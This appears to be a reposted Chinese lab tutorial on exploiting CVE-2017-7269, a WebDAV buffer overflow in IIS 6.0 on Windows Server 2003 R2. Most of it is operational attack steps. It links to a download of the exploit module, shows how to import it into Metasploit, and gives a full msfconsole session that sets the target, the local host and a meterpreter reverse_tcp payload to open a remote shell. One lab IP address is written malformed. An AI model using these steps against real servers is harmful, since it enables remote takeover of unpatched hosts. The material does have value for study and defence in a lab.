您的位置:首页 > 编程语言

IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)

2018-01-24 12:57 579 查看

漏洞简介

漏洞编号:CVE-2017-7269

发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)

漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。

漏洞类型:缓冲区溢出

漏洞等级:高危

影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证)

触发函数:ScStoragePathFromUrl函数

附加信息:ScStoragePathFromUrl函数被调用了两次

漏洞细节:在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞

实验环境

kali 192.168.1.160 win2003 192.168.197

下载exp

链接: https://pan.baidu.com/s/1eTkOLEU 密码: i6ry

导入模块

将CVE-2017-7269.rb导入到msf中

cd /usr/share/metasploit-framework/modules/exploits/windows/iis




开始攻击

使用msf进行攻击

msfconsole #打开msf

msf > search CVE-2017-7269
[!] Module database cache not built yet, using slow search

Matching Modules
================

Name                               Disclosure Date  Rank  Description
----                               ---------------  ----  -----------
exploit/windows/iis/cve-2017-7269  2017-03-31       good  CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow

msf > use exploit/windows/iis/cve-2017-7269
msf exploit(cve-2017-7269) > show options   #查看参数

Module options (exploit/windows/iis/cve-2017-7269):

Name                Current Setting  Required  Description
----                ---------------  --------  -----------
HttpHost            localhost        yes       http host for target
PhysicalPathLength  19               yes       length of physical path for target(include backslash)
RHOST                                yes       The target address
RPORT               80               yes       The target port (TCP)

Exploit target:

Id  Name
--  ----
0   Microsoft Windows Server 2003 R2

msf exploit(cve-2017-7269) > set RHOST 192.168.1.197  #设置目标ip
RHOST => 192.168.1.197
msf exploit(cve-2017-7269) > set HttpHost 192.168.1.197 #设置目标网站
HttpHost => 192.168.1.197
msf exploit(cve-2017-7269) > set LHOST 192.168.1.160  #设置本地ip
LHOST => 192.168.1.160
msf exploit(cve-2017-7269) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(cve-2017-7269) > exploit      #若成功则获取meterpreter权限
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: